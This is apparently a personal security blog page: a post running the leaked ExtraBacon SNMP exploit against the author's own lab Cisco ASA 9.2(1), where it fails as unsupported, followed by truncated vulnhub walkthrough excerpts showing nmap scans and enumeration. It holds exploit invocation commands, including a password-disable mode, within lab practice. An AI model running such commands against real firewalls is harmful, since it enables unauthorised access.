ExtraBacon Test On ASA Firewall

Hello everyone. i found some free time today and thought to give it a shot on extrabacon exploit of NSA’s Leaked stuff…
there are already some successful articles out there about it but i wanted to show you what happens on a newer ASA firewall when the explot fails.

Extrabacon exploit is a remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices affecting ASA versions 802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844. It exploits an overflow vulnerability using the Simple Network Management Protocol (SNMP) and relies on knowing the target’s uptime and software version.

In my case i installed a firewall ASA 921 and of course it didn’t work as expected. This version is not affected.
This is the outcome of the execution for info


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 92 E0 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 37600 time ticks, or 0:06:16

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED

To check the key file to see if it really contains what we're claiming:
# cat /home/trickster0/Desktop/EXBA/keys/Y57qgB.key

This is the output for the exec


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 E3 BC 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 58300 time ticks, or 0:09:43

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED
[+] generating exploit for exec mode pass-disable
[-] unsupported target version, abort

I will try and test some more stuff for fun. Have a nice day everyone!

Pegasus Timbeeeeer!!!! Walkthrough!

Hello everyone this is pegasus VM walkthrough for practising and having fun 😀
greetings to everyone for creating this great challenge

I started by running nmap to check all the services that pegasus has on it!

root@Tesla:~# nmap 192.168.7.138 -p- -A

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-05 17:51 EET
Nmap scan report for 192.168.7.138 (192.168.7.138)
Host is up (0.00016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 77:89:5b:52:ed:a5:58:6e:8e:09:f3:9e:f1:b0:d9:98 (DSA)
| 2048 d6:62:f5:12:31:36:ed:08:2c:1a:5e:9f:3c:aa:1f:d2 (RSA)
|_ 256 c5:f0:be:e5:c0:9c:28:6e:23:5c:48:38:8b:4a:c4:43 (ECDSA)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 36231/udp status
|_ 100024 1 42084/tcp status
8088/tcp open http nginx 1.1.19
42084/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:EA:73:26 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Continue reading

Nullbyte %0 walkthrough

Hey everyone this is the nullbyte VM walkthrough from vulnhub that was created by ly0n.
So we started with an nmap scan to check the open ports see their banners…

root@Tesla:~# nmap 192.168.7.133 -p- -A

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-10-31 14:35 EET
Nmap scan report for 192.168.7.133 (192.168.7.133)
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 34114/tcp status
|_ 100024 1 40102/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
34114/tcp open status 1 (RPC #100024)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 34114/tcp status
|_ 100024 1 40102/udp status
MAC Address: 00:0C:29:AD:C8:3A (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

i tried to connect on the ssh first but there was no clue there so i moved into the http enumeration
null1
i downloaded that illuminati cursed symbol picture file(btw i have nothing to do with illuminati and all that weird crap if u saw that triangled at the top of my website 😛 ) and checked it out for some steg style
Continue reading

Tr0ll2: The Revenge Of The Tr0ll!!

Hello everyone this is tr0ll 2 as i promised. Time to get some root access on the server, cause i didnt do much these days, so i will stop blabbing and start to explain what is going on and how everything happened… 😉

Of course as always i started an nmap scan to our dear tr0ll server

root@kali:~# nmap 192.168.124.131 -sV

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-12 18:13 EDT
Nmap scan report for 192.168.124.131 (192.168.124.131)
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:7C:A4:A9 (VMware)
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds

so this is where i started the ftp enumeration. I tried a couple of passwords and guessing. i actually got in and checked for the files and downloaded the only one i found there.

troll21

the file was password protected to i left hanging around for later… :/
lets go to the http service enumeration. this is the index page
troll22

the source didn’t contain anything interesting so lets move ahead. i thought to check the robots.txt and ok this is not a damn robots.txt file this is a huge list!!!i mean come on!!!
troll23
so because of this big list after i tried a few paths, they were fake…. -_- so i made a list and checked it with dirb
Continue reading

The troller trolled the Tr0ll

Hey everyone so this is the VM for the tr0ll server! i know it is kind of old but since i am trolling everyday in real life i thought i would try it so tr0ll2 is on the way too 😀
Let me add here that this challenge was made by Maleus and hosted by vulnhub!

Anyway lets stop with all the blabbing and start our challenge
tr0ll server ip:192.168.124.141
kali ip:192.168.124.134

At first i tried a nmap scan

root@kali:~# nmap 192.168.124.141 -vv -sV

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-10 12:01 EDT
NSE: Loaded 33 scripts for scanning.
Initiating ARP Ping Scan at 12:01
Scanning 192.168.124.141 [1 port]
Completed ARP Ping Scan at 12:01, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:01
Completed Parallel DNS resolution of 1 host. at 12:01, 0.00s elapsed
Initiating SYN Stealth Scan at 12:01
Scanning 192.168.124.141 (192.168.124.141) [1000 ports]
Discovered open port 21/tcp on 192.168.124.141
Discovered open port 22/tcp on 192.168.124.141
Discovered open port 80/tcp on 192.168.124.141
Completed SYN Stealth Scan at 12:01, 1.22s elapsed (1000 total ports)
Initiating Service scan at 12:01
Scanning 3 services on 192.168.124.141 (192.168.124.141)
Completed Service scan at 12:01, 6.10s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.124.141.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 12:01
Completed NSE at 12:01, 1.27s elapsed
Nmap scan report for 192.168.124.141 (192.168.124.141)
Host is up, received arp-response (0.00031s latency).
Scanned at 2015-10-10 12:01:04 EDT for 9s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:FE:92:AF (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.55 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)

Continue reading

Lord Of The Root: 1.0.1 write-up

So this is the first write-up of lord of the root 1.0.1 created by this guy #KookSec.

This is apparently on the level of oscp certificate which i plan on taking so lets see…

After setting it up on vmware and running this lotr server we start up kali and begin the process…..

after a quick search of my LAN to find the target’s ip we find that the ip is 192.168.124.138 btw i am 192.168.124.134.

So lets start by scanning the target machine for open ports and stuff

root@kali:~# nmap 192.168.124.138 -sT -p- -A
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-06 18:52 EDT
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.69% done
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.67% done; ETC: 18:55 (0:03:04 remaining)
Nmap scan report for 192.168.124.138 (192.168.124.138)
Host is up (0.0011s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8F:4B:CE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14, Linux 3.18, Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.07 ms 192.168.124.138 (192.168.124.138)

We can see that the port 22(ssh) is on so lets try to connect and see what we can get from it

Untitled

It says that it wants us to knock 😛 and it is easy as 1,2,3 so i am guessing i should knock on port 1,2,3

i used this script to knock
Continue reading